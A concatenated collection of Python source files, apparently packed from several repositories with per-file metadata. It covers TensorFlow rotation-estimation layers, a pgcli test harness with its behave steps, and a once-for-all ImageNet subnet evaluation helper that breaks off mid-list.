tf.keras.layers.Conv1D(self.hidden // 1, 3, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-11 x H/8) -> (batch x 2 x vec x 1 x 13-13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 2, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
]
# eg coil100
elif self.n_pixels == 64:
self.tempkernels = [
# (batch x 2 x vec x 1 x 64-2 x H/8) -> (batch x 2 x vec x 1 x 64-6/2=29 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 5, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 29 x H/8) -> (batch x 2 x vec x 1 x 29-3/2=13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 4, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13 x H/8) -> (batch x 2 x vec x 1 x 13-3 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-3 x H/8) -> (batch x 2 x vec x 1 x 13-6 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-6 x H/8) -> (batch x 2 x vec x 1 x 13-9 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-9 x H/8) -> (batch x 2 x vec x 1 x 13-11 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 3, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-11 x H/8) -> (batch x 2 x vec x 1 x 13-13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 2, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
]
# eg lfw
elif self.n_pixels == 125:
self.tempkernels = [
# (batch x 2 x vec x 1 x 125-2 x H/8) -> (batch x 2 x vec x 1 x 125-5/2 x H/8)
tf.keras.layers.Conv1D(self.hidden // 4, 4, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 60 x H/8) -> (batch x 2 x vec x 1 x 60-2/2 x H/8)
tf.keras.layers.Conv1D(self.hidden // 4, 3, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 29 x H/8) -> (batch x 2 x vec x 1 x 29-3/2=13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 4, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13 x H/8) -> (batch x 2 x vec x 1 x 13-3 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-3 x H/8) -> (batch x 2 x vec x 1 x 13-6 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-6 x H/8) -> (batch x 2 x vec x 1 x 13-9 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-9 x H/8) -> (batch x 2 x vec x 1 x 13-11 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 3, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-11 x H/8) -> (batch x 2 x vec x 1 x 13-13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 2, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
]
else:
raise ValueError('Other n pixels not yet supported!')
def call(self, inputs, training=None):
""" convolution compressing each vector to a lower dimensional representation
starting with kernel to aggregate the proximity and spatial information
secondly, aggregate the spatial information fully via 1D spatial convolution
:param inputs:
:param training:
:return:
"""
x = inputs
for kernel in self.proxkernels:
x = kernel(x)
for kernel in self.tempkernels:
x = kernel(x)
x = tf.reshape(x, [tf.shape(x)[0], 2, self.target_size, self.hidden])
return x
def get_config(self):
config = {
'hidden': self.hidden,
'activation': self.activation,
'target_size': self.target_size,
'n_pixels': self.n_pixels,
'w_init': self.w_init,
'b_init': self.b_init
}
base = super().get_config()
return dict(list(base.items()) + list(config.items()))
class BIC(tf.keras.layers.Layer):
def __init__(self, hidden=128, activation=tf.nn.leaky_relu, lstm_layers=3,
l2_regularization=0.0, edge_factor=0.5, gcn_layers=3, dropout=0.0,
size_vector_field=28, pixel_count_per_vector=14,
context=True, **kwargs):
super(BIC, self).__init__(**kwargs)
self.context = context
self.l2_regularization = l2_regularization
self.regularizer = tf.keras.regularizers.L2(l2_regularization)
self.size_vector_field = size_vector_field
self.pixel_count_per_vector = pixel_count_per_vector
self.hidden = hidden
self.activation = activation
self.edge_factor = edge_factor
self.gcn_layers = gcn_layers
self.lstm_layers = lstm_layers
self.dropout = dropout
self.w_init = tf.keras.initializers.HeNormal()
self.b_init = tf.constant_initializer(0.01)
self.adjacency = None
self.beamenc = None
self.extractor = None
self.cxtenc = None
self.tempkernels = []
self.gcn = []
self.lstm = []
self.mlp = []
self.cxt_mlp = []
def build(self, input_shape):
self.beamenc = BeamEncoder(hidden=self.hidden, target_size=self.size_vector_field,
activation=self.activation, n_pixels=self.pixel_count_per_vector)
self.adjacency = wheel_graph_adjacency_matrix(self.size_vector_field) * self.edge_factor
self.extractor = toeplitz_extractor(self.size_vector_field)
self.gcn = [
GraphConvolutionLayer(self.hidden, self.adjacency, activation=self.activation,
rate=self.dropout, l2=self.l2_regularization)
for _ in tf.range(self.gcn_layers)
]
self.lstm = [
tf.keras.layers.LSTM(self.hidden, return_sequences=False if tf.equal(i, self.lstm_layers - 1) else True,
name='lstm{}'.format(i))
for i in tf.range(self.lstm_layers)
]
self.mlp = [
tf.keras.layers.Dense(self.hidden // 2,
kernel_initializer=self.w_init, bias_initializer=self.b_init),
tf.keras.layers.Dense(self.hidden // 4,
kernel_initializer=self.w_init, bias_initializer=self.b_init),
tf.keras.layers.Dense(2, #activation=tf.nn.tanh,
kernel_initializer=self.w_init, bias_initializer=self.b_init)
]
self.cxt_mlp = [
tf.keras.layers.Dense(self.hidden,
kernel_initializer=self.w_init, bias_initializer=self.b_init),
tf.keras.layers.Dense(self.hidden, activation=self.activation,
kernel_initializer=self.w_init, bias_initializer=self.b_init)
]
# @tf.function
def call(self, inputs, training=None):
""" convolution compressing each vector to a lower dimensional representation
starting with kernel to aggregate the proximity and spatial information
secondly, aggregate the spatial information fully via 1D spatial convolution
:param inputs:
:param training:
:return:
"""
batch_dim = tf.shape(inputs)[0]
beamencoding = self.beamenc(inputs)
# encode the neighbor / spatial relationships via a GCN (batch x 2 x vec x hidden)
# important to encode neighborhood, since pure black vectors might appear multiple times in an image
# context encoder
ctx = tf.constant(0)
if self.context:
# init the context node with zeros
ctx = tf.concat([beamencoding, tf.zeros([batch_dim, 2, 1, tf.shape(beamencoding)[-1]])], axis=-2)
for i in range(len(self.gcn)):
ctx = self.gcn[i](ctx)
beamencoding += ctx[..., :-1, :]
ctx = ctx[..., -1, :]
# split (batch x 2 x vector x hidden) -> (batch x 1 x vector x hidden) x2
beamencoding_zero, beamencoding_theta = tf.split(beamencoding, num_or_size_splits=2, axis=1)
# reshape to (batch x 1 x vector x hidden) and (batch x vector x 1 x hidden)
# distance matrix | (batch x 1 x vector x hidden) - (batch x vector x 1 x hidden) | = (batch x vector x vector)
beamencoding_zero = tf.reshape(beamencoding_zero, [batch_dim, self.size_vector_field, self.hidden])
beamencoding_theta = tf.reshape(beamencoding_theta, [batch_dim, self.size_vector_field, self.hidden])
# is comparing the orientation even better since this leaves the magnitude to be used for the angle decoder
# the higher the closer the vectors
similarity = tf.reduce_sum(
(tf.expand_dims(beamencoding_zero, 1) - tf.expand_dims(beamencoding_theta, 2)) ** 2, -1)
similarity = 1 / (1 + similarity)
# reshape back to (batch x vector x vector)
prior = tf.reshape(similarity, [batch_dim, self.size_vector_field, self.size_vector_field])
angle_energy = prior
# Hadamard product with shifted Diagonal to extract diagonals from the masked Toeplitz Distance Matrix
# extractor shape (1 x vector x vector x vector)
prior = prior[:, None, ...] * self.extractor[None, ...]
# sum together the elements in the matrix (ie distances) (all others are zero) -> (batch x vector)
# crucial that permutation invariant op used since order on the diagonal does not matter
# mean instead of sum, since sum leads to over confident distributions
# however, since the rest but the shifted diagonal are zero, the mean is quiet small
prior = tf.reduce_sum(prior, axis=(-1, -2))
# # distribution over (batch x vector) which represents the shift
prior = tf.nn.softmax(prior, axis=-1)
# additionally for the deployment phase, we use a second prediction task ie predicting the
# canonicalization vector 0 (upper left corner) for reference to be able to turn a single image back
unit_vec = beamencoding_theta + ctx[:, 1, None, :] if self.context else beamencoding_theta
unit_vec = tf.reshape(unit_vec, [batch_dim, self.size_vector_field, self.hidden])
# the RNN aims to encode the positional information of the vectors (ordering)
# which gives raise to the angle of rotation
for i in range(len(self.lstm)):
unit_vec = self.lstm[i](unit_vec)
unit_vec = tf.reshape(unit_vec, [batch_dim, self.hidden])
rnn_encoding = unit_vec
# mlp decoder
for i in range(len(self.mlp)):
unit_vec = self.mlp[i](unit_vec)
unit_vec /= tf.math.sqrt((unit_vec[:, 0] - 0) ** 2 + (unit_vec[:, 1] - 0) ** 2)[:, None]
return prior, unit_vec, beamencoding, ctx, similarity, \
beamencoding_zero, beamencoding_theta, angle_energy, rnn_encoding
def get_config(self):
config = {
'hidden': self.hidden,
'activation': self.activation,
'w_init': self.w_init,
'b_init': self.b_init
}
base = super().get_config()
return dict(list(base.items()) + list(config.items()))
class Block(tf.keras.models.Sequential):
def __init__(self,n,m):
super().__init__()
for i in range(m):
self.add(tf.keras.layers.Conv2D(filters = n, kernel_size=(3,3),
strides=(1,1),padding = 'same',activation = "relu"))
self.add(tf.keras.layers.MaxPool2D(pool_size = (2, 2)))
class Dense(tf.keras.models.Sequential):
def __init__(self,n,m=2):
super().__init__()
for i in range(m):
self.add(tf.keras.layers.Dense(units = n, activation = "relu"))
class VGG11(tf.keras.models.Sequential):
def __init__(self, input_shape, classes, filters = 64):
super().__init__()
self.add(tf.keras.layers.InputLayer(input_shape = input_shape))
# Backbone
self.add(Block(n = filters * 1, m = 1))
self.add(Block(n = filters * 2, m = 1))
self.add(Block(n = filters * 4, m = 2))
self.add(Block(n = filters * 8, m = 2))
self.add(Block(n = filters * 8, m = 2))
# top
self.add(tf.keras.layers.Flatten())
self.add(Dense(n = filters * 64))
self.add(tf.keras.layers.Dense(units = classes,activation = "softmax"))
``` |
{
"source": "JohSchoeneberg/pyLattice_tutorials",
"score": 3
} |
#### File: pyLattice_tutorials/src/extract_data.py
```python
def extract_data_from_filename(file_name):
# package for 3d visualization
#from itkwidgets import view
#from aicssegmentation.core.visual import seg_fluo_side_by_side, single_fluorescent_view, segmentation_quick_view
import matplotlib.pyplot as plt
plt.rcParams["figure.figsize"] = [16, 12]
# package for io
from aicsimageio import AICSImage #, omeTifWriter
reader = AICSImage(file_name)
IMG = reader.data
# #print(IMG.shape)
structure_img = IMG[0,0,:,:,:]
return structure_img
``` |
{
"source": "johshoff/pgcli",
"score": 2
} |
#### File: pgspecial/tests/dbutils.py
```python
import pytest
import psycopg2
import psycopg2.extras
# TODO: should this be somehow be divined from environment?
POSTGRES_USER, POSTGRES_HOST = 'postgres', 'localhost'
def db_connection(dbname=None):
conn = psycopg2.connect(user=POSTGRES_USER, host=POSTGRES_HOST,
database=dbname)
conn.autocommit = True
return conn
try:
conn = db_connection()
CAN_CONNECT_TO_DB = True
SERVER_VERSION = conn.server_version
except:
CAN_CONNECT_TO_DB = False
SERVER_VERSION = 0
dbtest = pytest.mark.skipif(
not CAN_CONNECT_TO_DB,
reason="Need a postgres instance at localhost accessible by user 'postgres'")
def create_db(dbname):
with db_connection().cursor() as cur:
try:
cur.execute('''CREATE DATABASE _test_db''')
except:
pass
def setup_db(conn):
with conn.cursor() as cur:
# schemas
cur.execute('create schema schema1')
cur.execute('create schema schema2')
# tables
cur.execute('create table tbl1(id1 integer, txt1 text)')
cur.execute('create table tbl2(id2 integer, txt2 text)')
cur.execute('create table schema1.s1_tbl1(id1 integer, txt1 text)')
# views
cur.execute('create view vw1 as select * from tbl1')
cur.execute('''create view schema1.s1_vw1 as select * from
schema1.s1_tbl1''')
# datatype
cur.execute('create type foo AS (a int, b text)')
# functions
cur.execute('''create function func1() returns int language sql as
$$select 1$$''')
cur.execute('''create function schema1.s1_func1() returns int language
sql as $$select 2$$''')
def teardown_db(conn):
with conn.cursor() as cur:
cur.execute('''
DROP SCHEMA public CASCADE;
CREATE SCHEMA public;
DROP SCHEMA IF EXISTS schema1 CASCADE;
DROP SCHEMA IF EXISTS schema2 CASCADE''')
```
#### File: features/steps/step_definitions.py
```python
from __future__ import unicode_literals
import pip
import pexpect
import os
import re
from behave import given, when, then
@given('we have pgcli installed')
def step_install_cli(_):
"""
Check that pgcli is in installed modules.
"""
dists = set([di.key for di in pip.get_installed_distributions()])
assert 'pgcli' in dists
@when('we run pgcli')
def step_run_cli(context):
"""
Run the process using pexpect.
"""
context.cli = pexpect.spawnu('pgcli')
context.exit_sent = False
@when('we wait for prompt')
def step_wait_prompt(context):
"""
Make sure prompt is displayed.
"""
_expect_exact(context, '{0}> '.format(context.conf['dbname']), timeout=5)
@when('we send "ctrl + d"')
def step_ctrl_d(context):
"""
Send Ctrl + D to hopefully exit.
"""
context.cli.sendcontrol('d')
context.exit_sent = True
@when('we send "\?" command')
def step_send_help(context):
"""
Send \? to see help.
"""
context.cli.sendline('\?')
@when('we create database')
def step_db_create(context):
"""
Send create database.
"""
context.cli.sendline('create database {0};'.format(
context.conf['dbname_tmp']))
context.response = {
'database_name': context.conf['dbname_tmp']
}
@when('we drop database')
def step_db_drop(context):
"""
Send drop database.
"""
context.cli.sendline('drop database {0};'.format(
context.conf['dbname_tmp']))
@when('we create table')
def step_create_table(context):
"""
Send create table.
"""
context.cli.sendline('create table a(x text);')
@when('we insert into table')
def step_insert_into_table(context):
"""
Send insert into table.
"""
context.cli.sendline('''insert into a(x) values('xxx');''')
@when('we update table')
def step_update_table(context):
"""
Send insert into table.
"""
context.cli.sendline('''update a set x = 'yyy' where x = 'xxx';''')
@when('we select from table')
def step_select_from_table(context):
"""
Send select from table.
"""
context.cli.sendline('select * from a;')
@when('we delete from table')
def step_delete_from_table(context):
"""
Send deete from table.
"""
context.cli.sendline('''delete from a where x = 'yyy';''')
@when('we drop table')
def step_drop_table(context):
"""
Send drop table.
"""
context.cli.sendline('drop table a;')
@when('we connect to test database')
def step_db_connect_test(context):
"""
Send connect to database.
"""
db_name = context.conf['dbname']
context.cli.sendline('\connect {0}'.format(db_name))
@when('we start external editor providing a file name')
def step_edit_file(context):
"""
Edit file with external editor.
"""
context.editor_file_name = 'test_file_{0}.sql'.format(context.conf['vi'])
if os.path.exists(context.editor_file_name):
os.remove(context.editor_file_name)
context.cli.sendline('\e {0}'.format(context.editor_file_name))
_expect_exact(context, 'nano', timeout=2)
@when('we type sql in the editor')
def step_edit_type_sql(context):
context.cli.sendline('select * from abc')
# Write the file.
context.cli.sendcontrol('o')
# Confirm file name sending "enter".
context.cli.sendcontrol('m')
@when('we exit the editor')
def step_edit_quit(context):
context.cli.sendcontrol('x')
@then('we see the sql in prompt')
def step_edit_done_sql(context):
_expect_exact(context, 'select * from abc', timeout=2)
# Cleanup the command line.
context.cli.sendcontrol('u')
# Cleanup the edited file.
if context.editor_file_name and os.path.exists(context.editor_file_name):
os.remove(context.editor_file_name)
@when('we connect to postgres')
def step_db_connect_postgres(context):
"""
Send connect to database.
"""
context.cli.sendline('\connect postgres')
@when('we refresh completions')
def step_refresh_completions(context):
"""
Send refresh command.
"""
context.cli.sendline('\\refresh')
@then('pgcli exits')
def step_wait_exit(context):
"""
Make sure the cli exits.
"""
_expect_exact(context, pexpect.EOF, timeout=5)
@then('we see pgcli prompt')
def step_see_prompt(context):
"""
Wait to see the prompt.
"""
_expect_exact(context, '{0}> '.format(context.conf['dbname']), timeout=5)
@then('we see help output')
def step_see_help(context):
for expected_line in context.fixture_data['help_commands.txt']:
_expect_exact(context, expected_line, timeout=1)
@then('we see database created')
def step_see_db_created(context):
"""
Wait to see create database output.
"""
_expect_exact(context, 'CREATE DATABASE', timeout=2)
@then('we see database dropped')
def step_see_db_dropped(context):
"""
Wait to see drop database output.
"""
_expect_exact(context, 'DROP DATABASE', timeout=2)
@then('we see database connected')
def step_see_db_connected(context):
"""
Wait to see drop database output.
"""
_expect_exact(context, 'You are now connected to database', timeout=2)
@then('we see table created')
def step_see_table_created(context):
"""
Wait to see create table output.
"""
_expect_exact(context, 'CREATE TABLE', timeout=2)
@then('we see record inserted')
def step_see_record_inserted(context):
"""
Wait to see insert output.
"""
_expect_exact(context, 'INSERT 0 1', timeout=2)
@then('we see record updated')
def step_see_record_updated(context):
"""
Wait to see update output.
"""
_expect_exact(context, 'UPDATE 1', timeout=2)
@then('we see data selected')
def step_see_data_selected(context):
"""
Wait to see select output.
"""
_expect_exact(context, 'yyy', timeout=1)
_expect_exact(context, 'SELECT 1', timeout=1)
@then('we see record deleted')
def step_see_data_deleted(context):
"""
Wait to see delete output.
"""
_expect_exact(context, 'DELETE 1', timeout=2)
@then('we see table dropped')
def step_see_table_dropped(context):
"""
Wait to see drop output.
"""
_expect_exact(context, 'DROP TABLE', timeout=2)
@then('we see completions refresh started')
def step_see_refresh_started(context):
"""
Wait to see refresh output.
"""
_expect_exact(context, 'refresh started in the background', timeout=2)
def _expect_exact(context, expected, timeout):
try:
context.cli.expect_exact(expected, timeout=timeout)
except:
# Strip color codes out of the output.
actual = re.sub('\x1b\[[0-9;]*m', '', context.cli.before)
actual = re.sub('\x1b\[(.*)?.{1}', '', actual)
raise Exception('Expected:\n---\n{0}\n---\n\nActual:\n---\n{1}\n---'.format(
expected,
actual))
``` |
{
"source": "johsnows/once-for-all",
"score": 2
} |
#### File: ofa/tutorial/imagenet_eval_helper.py
```python
import os.path as osp
import numpy as np
import math
from tqdm import tqdm
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torch.utils.data
from torchvision import transforms, datasets
from ofa.utils import AverageMeter, accuracy
from ofa.model_zoo import ofa_specialized
from ofa.imagenet_classification.elastic_nn.utils import set_running_statistics
import copy
import random
def evaluate_ofa_resnet_subnet(ofa_net, path, net_config, data_loader, batch_size, device='cuda:0'):
assert 'w' in net_config and 'd' in net_config and 'e' in net_config
assert len(net_config['w']) == 6 and len(net_config['e']) == 18 and len(net_config['d']) == 5
ofa_net.set_active_subnet(w=net_config['w'], d=net_config['d'], e=net_config['e'])
subnet = ofa_net.get_active_subnet().to(device)
calib_bn(subnet, path, 224, batch_size)
top1 = validate(subnet, path, 224, data_loader, batch_size, device)
return top1
def evaluate_ofa_resnet_ensemble_subnet(ofa_net, path, net_config1, net_config2, data_loader, batch_size, device='cuda:0'):
assert 'w' in net_config1 and 'd' in net_config1 and 'e' in net_config1
assert len(net_config1['w']) == 6 and len(net_config1['e']) == 18 and len(net_config1['d']) == 5
ofa_net.set_active_subnet(w=net_config1['w'], d=net_config1['d'], e=net_config1['e'])
subnet1 = ofa_net.get_active_subnet().to(device)
calib_bn(subnet1, path, 224, batch_size)
ofa_net.set_active_subnet(w=net_config2['w'], d=net_config2['d'], e=net_config2['e'])
subnet2 = ofa_net.get_active_subnet().to(device)
calib_bn(subnet2, path, 224, batch_size)
# assert net_config2['r'][0]==net_config1['r'][0]
subnets = []
subnets.append(subnet2)
subnets.append(subnet1)
top1 = ensemble_validate(subnets, path, 224, data_loader, batch_size, device)
return top1
def evaluate_ofa_subnet(ofa_net, path, net_config, data_loader, batch_size, device='cuda:0'):
assert 'ks' in net_config and 'd' in net_config and 'e' in net_config
assert len(net_config['ks']) == 20 and len(net_config['e']) == 20 and len(net_config['d']) == 5
ofa_net.set_active_subnet(ks=net_config['ks'], d=net_config['d'], e=net_config['e'])
subnet = ofa_net.get_active_subnet().to(device)
calib_bn(subnet, path, net_config['r'][0], batch_size)
top1 = validate(subnet, path, net_config['r'][0], data_loader, batch_size, device)
return top1
def evaluate_ofa_ensemble_subnet(ofa_net, path, net_config1, net_config2, data_loader, batch_size, device='cuda:0'):
assert 'ks' in net_config1 and 'd' in net_config1 and 'e' in net_config1
assert len(net_config1['ks']) == 20 and len(net_config1['e']) == 20 and len(net_config1['d']) == 5
ofa_net.set_active_subnet(ks=net_config1['ks'], d=net_config1['d'], e=net_config1['e'])
subnet1 = ofa_net.get_active_subnet().to(device)
calib_bn(subnet1, path, net_config1['r'][0], batch_size)
ofa_net.set_active_subnet(ks=net_config2['ks'], d=net_config2['d'], e=net_config2['e'])
subnet2 = ofa_net.get_active_subnet().to(device)
calib_bn(subnet2, path, net_config2['r'][0], batch_size)
assert net_config2['r'][0]==net_config1['r'][0]
subnets = []
subnets.append(subnet2)
subnets.append(subnet1)
top1 = ensemble_validate(subnets, path, net_config2['r'][0], data_loader, batch_size, device)
return top1
def calib_bn(net, path, image_size, batch_size, num_images=2000):
# print('Creating dataloader for resetting BN running statistics...')
dataset = datasets.ImageFolder(
osp.join(
path,
'train'),
transforms.Compose([
transforms.RandomResizedCrop(image_size),
transforms.RandomHorizontalFlip(),
transforms.ColorJitter(brightness=32. / 255., saturation=0.5),
transforms.ToTensor(),
transforms.Normalize(
mean=[
0.485,
0.456,
0.406],
std=[
0.229,
0.224,
0.225]
),
])
)
chosen_indexes = np.random.choice(list(range(len(dataset))), num_images)
sub_sampler = torch.utils.data.sampler.SubsetRandomSampler(chosen_indexes)
data_loader = torch.utils.data.DataLoader(
dataset,
sampler=sub_sampler,
batch_size=batch_size,
num_workers=16,
pin_memory=True,
drop_last=False,
)
# print('Resetting BN running statistics (this may take 10-20 seconds)...')
set_running_statistics(net, data_loader)
def ensemble_validate(nets, path, image_size, data_loader, batch_size=100, device='cuda:0'):
if 'cuda' in device:
print('use cuda')
for net in nets:
net = torch.nn.DataParallel(net).to(device)
else:
for net in nets:
net = net.to(device)
data_loader.dataset.transform = transforms.Compose([
transforms.Resize(int(math.ceil(image_size / 0.875))),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
),
])
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss().to(device)
for net in nets:
net.eval()
net = net.to(device)
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
with torch.no_grad():
with tqdm(total=len(data_loader), desc='Validate') as t:
for i, (images, labels) in enumerate(data_loader):
images, labels = images.to(device), labels.to(device)
# compute output
n = len(nets)
output = 0
for i, net in enumerate(nets):
if i == 0:
output =net(images)
else:
output+=net(images)
output = output/n
loss = criterion(output, labels)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, labels, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0].item(), images.size(0))
top5.update(acc5[0].item(), images.size(0))
t.set_postfix({
'loss': losses.avg,
'top1': top1.avg,
'top5': top5.avg,
'img_size': images.size(2),
})
t.update(1)
print('Results: loss=%.5f,\t top1=%.3f,\t top5=%.1f' % (losses.avg, top1.avg, top5.avg))
return top1.avg
def validate(net, path, image_size, data_loader, batch_size=100, device='cuda:0'):
if 'cuda' in device:
net = torch.nn.DataParallel(net).to(device)
else:
net = net.to(device)
data_loader.dataset.transform = transforms.Compose([
transforms.Resize(int(math.ceil(image_size / 0.875))),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
),
])
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss().to(device)
net.eval()
net = net.to(device)
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
with torch.no_grad():
with tqdm(total=len(data_loader), desc='Validate') as t:
for i, (images, labels) in enumerate(data_loader):
images, labels = images.to(device), labels.to(device)
# compute output
output = net(images)
loss = criterion(output, labels)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, labels, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0].item(), images.size(0))
top5.update(acc5[0].item(), images.size(0))
t.set_postfix({
'loss': losses.avg,
'top1': top1.avg,
'top5': top5.avg,
'img_size': images.size(2),
})
t.update(1)
print('Results: loss=%.5f,\t top1=%.1f,\t top5=%.1f' % (losses.avg, top1.avg, top5.avg))
return top1.avg
def evaluate_ofa_specialized(path, data_loader, batch_size=100, device='cuda:0', ensemble=False):
def select_platform_name():
valid_platform_name = [
'pixel1', 'pixel2', 'note10', 'note8', 's7edge', 'lg-g8', '1080ti', 'v100', 'tx2', 'cpu', 'flops'
]
print("Please select a hardware platform from ('pixel1', 'pixel2', 'note10', 'note8', 's7edge', 'lg-g8', '1080ti', 'v100', 'tx2', 'cpu', 'flops')!\n")
while True:
platform_name = input()
platform_name = platform_name.lower()
if platform_name in valid_platform_name:
return platform_name
print("Platform name is invalid! Please select in ('pixel1', 'pixel2', 'note10', 'note8', 's7edge', 'lg-g8', '1080ti', 'v100', 'tx2', 'cpu', 'flops')!\n")
def select_netid(platform_name):
platform_efficiency_map = {
'pixel1': {
143: 'pixel1_lat@[email protected]_finetune@75',
132: 'pixel1_lat@[email protected]_finetune@75',
79: 'pixel1_lat@[email protected]_finetune@75',
58: 'pixel1_lat@[email protected]_finetune@75',
40: 'pixel1_lat@[email protected]_finetune@25',
28: 'pixel1_lat@[email protected]_finetune@25',
20: 'pixel1_lat@[email protected]_finetune@25',
},
'pixel2': {
62: 'pixel2_lat@[email protected]_finetune@25',
50: 'pixel2_lat@[email protected]_finetune@25',
35: 'pixel2_lat@[email protected]_finetune@25',
25: 'pixel2_lat@[email protected]_finetune@25',
},
'note10': {
64: 'note10_lat@[email protected]_finetune@75',
50: 'note10_lat@[email protected]_finetune@75',
41: 'note10_lat@[email protected]_finetune@75',
30: 'note10_lat@[email protected]_finetune@75',
22: 'note10_lat@[email protected]_finetune@25',
16: 'note10_lat@[email protected]_finetune@25',
11: 'note10_lat@[email protected]_finetune@25',
8: 'note10_lat@[email protected]_finetune@25',
},
'note8': {
65: 'note8_lat@[email protected]_finetune@25',
49: 'note8_lat@[email protected]_finetune@25',
31: 'note8_lat@[email protected]_finetune@25',
22: 'note8_lat@[email protected]_finetune@25',
},
's7edge': {
88: 's7edge_lat@[email protected]_finetune@25',
58: 's7edge_lat@[email protected]_finetune@25',
41: 's7edge_lat@[email protected]_finetune@25',
29: 's7edge_lat@[email protected]_finetune@25',
},
'lg-g8': {
24: 'LG-G8_lat@[email protected]_finetune@25',
16: 'LG-G8_lat@[email protected]_finetune@25',
11: 'LG-G8_lat@[email protected]_finetune@25',
8: 'LG-G8_lat@[email protected]_finetune@25',
},
'1080ti': {
27: '1080ti_gpu64@[email protected]_finetune@25',
22: '1080ti_gpu64@[email protected]_finetune@25',
15: '1080ti_gpu64@[email protected]_finetune@25',
12: '1080ti_gpu64@[email protected]_finetune@25',
},
'v100': {
11: 'v100_gpu64@[email protected]_finetune@25',
9: 'v100_gpu64@[email protected]_finetune@25',
6: 'v100_gpu64@[email protected]_finetune@25',
5: 'v100_gpu64@[email protected]_finetune@25',
},
'tx2': {
96: 'tx2_gpu16@[email protected]_finetune@25',
80: 'tx2_gpu16@[email protected]_finetune@25',
47: 'tx2_gpu16@[email protected]_finetune@25',
35: 'tx2_gpu16@[email protected]_finetune@25',
},
'cpu': {
17: 'cpu_lat@[email protected]_finetune@25',
15: 'cpu_lat@[email protected]_finetune@25',
11: 'cpu_lat@[email protected]_finetune@25',
10: 'cpu_lat@[email protected]_finetune@25',
},
'flops': {
595: 'flops@[email protected]_finetune@75',
482: 'flops@[email protected]_finetune@75',
389: 'flops@[email protected]_finetune@75',
}
}
sub_efficiency_map = platform_efficiency_map[platform_name]
if not platform_name == 'flops':
print("Now, please specify a latency constraint for model specialization among", sorted(list(sub_efficiency_map.keys())), 'ms. (Please just input the number.) \n')
else:
print("Now, please specify a FLOPs constraint for model specialization among", sorted(list(sub_efficiency_map.keys())), 'MFLOPs. (Please just input the number.) \n')
while True:
efficiency_constraint = input()
if not efficiency_constraint.isdigit():
print('Sorry, please input an integer! \n')
continue
efficiency_constraint = int(efficiency_constraint)
if not efficiency_constraint in sub_efficiency_map.keys():
print('Sorry, please choose a value from: ', sorted(list(sub_efficiency_map.keys())), '.\n')
continue
return sub_efficiency_map[efficiency_constraint]
if not ensemble:
platform_name = select_platform_name()
net_id = select_netid(platform_name)
net, image_size = ofa_specialized(net_id=net_id, pretrained=True)
validate(net, path, image_size, data_loader, batch_size, device)
else:
nets = []
for i in range(2):
print('{}model'.format(i))
platform_name = select_platform_name()
net_id = select_netid(platform_name)
net, image_size = ofa_specialized(net_id=net_id, pretrained=True)
nets.append(net)
ensemble_validate(nets, path, image_size, data_loader, batch_size, device)
return net_id
net_id = ['pixel1_lat@[email protected]_finetune@75', 'pixel1_lat@[email protected]_finetune@75',
'pixel1_lat@[email protected]_finetune@75', 'pixel1_lat@[email protected]_finetune@75',
'pixel1_lat@[email protected]_finetune@25', 'pixel1_lat@[email protected]_finetune@25',
'pixel1_lat@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25',
'pixel2_lat@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25',
'pixel2_lat@[email protected]_finetune@25', 'note10_lat@[email protected]_finetune@75',
'note10_lat@[email protected]_finetune@75', 'note10_lat@[email protected]_finetune@75',
